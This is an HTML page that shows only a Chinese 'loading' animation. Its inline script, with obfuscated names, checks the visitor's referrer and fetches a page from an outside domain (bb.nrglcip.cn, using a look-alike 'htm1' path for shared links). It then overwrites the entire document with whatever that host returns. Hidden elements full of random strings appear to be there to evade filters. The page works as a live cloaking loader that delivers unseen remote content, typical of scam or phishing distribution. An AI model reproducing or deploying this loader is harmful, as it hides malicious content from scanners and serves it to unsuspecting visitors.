<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oTb5CRL7M {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oTb5CRL7M .udcCHYi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oTb5CRL7M .content {
            line-height: 50px;
            text-align: center
        }

        .oTb5CRL7M .img {
            width: 100%
        }

        .oTb5CRL7M .LniYvIoeHV {
            text-align: center
        }

        .oTb5CRL7M .LniYvIoeHV span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oTb5CRL7M .LniYvIoeHV span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oTb5CRL7M .LniYvIoeHV span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oTb5CRL7M .LniYvIoeHV span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oTb5CRL7M .LniYvIoeHV span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oTb5CRL7M .LniYvIoeHV span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oTb5CRL7M .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XTCHNqmOTJKq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DvacO = XTCHNqmOTJKq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DvacO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DvacO +".html?a=share";
		}
		
        Lh0uWF=url+"#"+new Date().getTime();
        Lh0uWF && function() {
            $.get(Lh0uWF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >b6ck6Jv6dFx2Jp10s8Z1azsgZdTa8xpC9p2LD53UI6D31DKAnzeGFiSSt3</li>
<p  style='display:none'>lDOnVXIhAnRdtLYZ2QcRZWnn9P8</p>
<b style='display:none' >QuKVptrQjV90hRkLRS4nz1DzrMQuX6d574e4mnQr2p4HexxhvGMkTuI1bosvsu5F4NknmTg3QEQdkGqHPc3Jcmx</b>
<b style='display:none' >QuKVptrQjV90hRkLRS4nz1DzrMQuX6d574e4mnQr2p4HexxhvGMkTuI1bosvsu5F4NknmTg3QEQdkGqHPc3Jcmx</b><div class="oTb5CRL7M">
    <div class="udcCHYi">
        <div class="LniYvIoeHV">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >QsfNQ2tGiUu2nVLN25xBTmoADRxEIw649qiLMm7uOdic61E9twaioQ9XIuiTUBIT6Qw73AeFJIw0Vb82</b>
<img  src='' style='display:none'>
<span style='display:none'>HIVk76XCuRS5mQV4nViY5w01K1Rz6tBMZFtePHE7Ja4lorGbZshi5htYR6P</span>
<h1 style='display:none' >h6J3MkP3D4IAjMGBGXpoKRSFutca8zwG1xo14JndGCN530Znf4YcWDd1qBZ9JQKKhEiAqhaAskoNZRlv8G</h1>
<span style='display:none'>HIVk76XCuRS5mQV4nViY5w01K1Rz6tBMZFtePHE7Ja4lorGbZshi5htYR6P</span>
<p  style='display:none'>TCnsxdjN0tNJcvQWmDDdUgd1rSu84pNCjrFYD9CIwrdj</p>
<div style='display:none'>ntBb5mp9AykGEI46HlS9zixgKA5JpVKJtz9cenHVXGN</div>
<p  style='display:none'>TCnsxdjN0tNJcvQWmDDdUgd1rSu84pNCjrFYD9CIwrdj</p>
<a  href='#' style='display:none'>EXYkPFMQyQKq5kK48NaJm4nBHpy1yUdfvYYWoB</a></body>
</html>